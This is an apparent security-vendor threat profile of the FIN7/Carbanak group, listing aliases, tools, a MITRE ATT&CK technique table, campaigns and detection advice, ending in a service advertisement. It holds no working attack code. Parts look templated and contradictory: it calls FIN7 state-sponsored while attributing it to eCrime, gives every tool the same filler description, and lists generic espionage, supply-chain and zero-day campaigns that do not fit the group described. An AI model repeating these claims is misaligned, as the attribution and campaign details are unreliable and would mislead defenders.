FIN7 / Carbanak Group (also known as Carbanak, Carbon Spider, Sangria Tempest, ELBRUS) is a state-sponsored advanced persistent threat group attributed to eCrime (Ukrainian-Russian), active since 2013. The group primarily targets retail, hospitality, food service, finance sectors. It is tracked by MITRE ATT&CK as G0046.
Overview & Attribution
Prolific eCrime group responsible for over $1 billion in theft, evolving from POS malware to ransomware affiliate operations while operating a fake pentesting company (Combi Security, Bastion Secure).
FIN7 has been active since 2013, attributed to eCrime (Ukrainian-Russian). The group is known for targeting retail, hospitality, food service, finance using a combination of custom malware, living-off-the-land techniques, and sophisticated social engineering.
- Attribution: eCrime (Ukrainian-Russian)
- Active since: 2013
- Primary targets: retail, hospitality, food service, finance
- Also known as: Carbanak, Carbon Spider, Sangria Tempest, ELBRUS
Arsenal & Tools
FIN7 employs a diverse arsenal of custom and shared tooling:
- Carbanak: Custom/shared tooling used in operations
- Lizar/Tirion: Custom/shared tooling used in operations
- POWERPLANT: Custom/shared tooling used in operations
- BIRDDOG: Custom/shared tooling used in operations
- Cobalt Strike: Custom/shared tooling used in operations
Targeting & Operations
The group focuses on retail, hospitality, food service, finance sectors, with operations spanning multiple geographic regions. Their campaigns typically involve carefully crafted spearphishing, strategic watering holes, and exploitation of public-facing applications.
FIN7 is characterized by persistent, long-term access operations. Once inside a target network, the group establishes multiple redundant persistence mechanisms and moves laterally to high-value systems before beginning data exfiltration.
MITRE ATT&CK Mapping
| Tactic | Technique | Usage |
|---|---|---|
| Initial Access | T1566.001 Phishing Attachment | Themed spearphishing campaigns |
| Execution | T1059.001 PowerShell | POWERPLANT backdoor |
| Persistence | T1053.005 Scheduled Task | Task-based persistence |
| Defense Evasion | T1027.002 Software Packing | Heavy payload obfuscation |
| Collection | T1113 Screen Capture | Screenshot capture |
| C2 | T1071.001 Web Protocols | Carbanak HTTP C2 |
Notable Campaigns
FIN7 has been linked to multiple significant campaigns targeting retail, hospitality, food service, finance organizations. The group continuously evolves its tooling and infrastructure to evade detection while maintaining persistent access to compromised networks.
- Long-term espionage: Multi-year intrusions into government and defense networks
- Supply chain targeting: Compromise of technology providers and managed service providers
- Zero-day exploitation: Use of previously unknown vulnerabilities for initial access
Detection & Defense
- Threat intelligence integration: Monitor for known FIN7 IOCs and TTPs in SIEM/EDR platforms
- Network monitoring: Detect C2 patterns associated with Carbanak and related tooling
- Email security: Implement advanced phishing detection for spearphishing campaigns
- Endpoint detection: Deploy behavioral detection rules for known FIN7 TTPs
- Patch management: Prioritize patching of vulnerabilities known to be exploited by this group
- Lateral movement detection: Monitor for suspicious authentication patterns and admin tool usage
Defend Against FIN7
Mjolnir Security provides specialized capabilities to detect and respond to FIN7 operations.
- APT Threat Hunting Proactive hunting for FIN7 TTPs, tooling artifacts, and infrastructure indicators within your environment.
- Threat Intelligence Continuous monitoring of FIN7 campaigns and infrastructure changes with actionable intelligence for your defense team.
- 24/7 Incident Response Rapid containment and forensic investigation. Call +1 833 403 5875.
Stay ahead of emerging threats. Get notified when we publish new intelligence reports and advisories.
Subscribe to Alerts